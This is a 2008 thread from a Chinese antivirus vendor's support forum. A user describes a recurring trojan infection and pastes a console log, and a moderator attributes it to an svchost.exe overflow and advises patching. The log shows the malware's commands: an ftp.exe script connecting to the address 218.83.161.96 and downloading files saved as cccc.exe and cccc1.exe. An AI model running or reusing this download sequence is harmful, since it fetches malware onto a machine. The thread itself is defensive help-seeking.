微点交流论坛
» 游客:  注册 | 登录 | 帮助

 

作者:
标题: 求助
lr494
新手上路





积分 23
发帖 23
注册 2006-8-14
#1  求助

电脑出现木马,微点可以拦截但无法根治,一天出现几率在4次以上。现象:自动运行CMD命令,然后生成零时文件,释放出CCCC.EXE程序,CCCC。EXE连接外网。被微点拦截后得DOS提示如下:
C:\WINNT\system32>del cccc.exe
找不到 C:\WINNT\system32\cccc.exe

C:\WINNT\system32>ftp.exe -s:C:\WINNT\help\help.dll
ftp> OPEN 218.83.161.96
Connected to 218.83.161.96.
220 Serv-U FTP Server v6.4 for WinSock ready...
User (218.83.161.96none)):
230 User logged in, proceed.
ftp> get crr.ini cccc.exe
200 PORT Command successful.
150 Opening ASCII mode data connection for crr.ini (39949 Bytes).
226 Transfer complete.
ftp: 39949 bytes received in 1.80Seconds 22.24Kbytes/sec.
ftp> get crt.ini cccc1.exe
200 PORT Command successful.
150 Opening ASCII mode data connection for crt.ini (3721 Bytes).

※ ※ ※ 本文纯属【lr494】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2008-5-5 21:20
查看资料  发送邮件  发短消息   编辑帖子
Legend
超级版主

超级版主



积分 77171
发帖 70170
注册 2005-10-29
#2  

请将您的技术支持信息(微点主界面-->辅助功能-->生成技术支持信息)发送到support@micropoint.com.cn我们帮您分析一下。
请在信中附上这个帖子的地址,方便帮您查收处理。

※文章所有权归【Legend】与【东方微点论坛】共同所有,转载请注明出处!※

微点官方认证新浪微博:欢迎进入 微点新浪微博
微点技术支持邮箱: support@micropoint.com.cn
给Legend发短消息
2008-5-5 21:23
查看资料  发短消息   编辑帖子
Legend
超级版主

超级版主



积分 77171
发帖 70170
注册 2005-10-29
#3  

此问题是由于svchost.exe被溢出导致的,请楼主安装系统补丁,并开启微点防火墙进行防御。

※文章所有权归【Legend】与【东方微点论坛】共同所有,转载请注明出处!※

微点官方认证新浪微博:欢迎进入 微点新浪微博
微点技术支持邮箱: support@micropoint.com.cn
给Legend发短消息
2008-5-13 11:00
查看资料  发短消息   编辑帖子



论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏


[ 联系我们 - 东方微点 ]


北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司

闽ICP备05030815号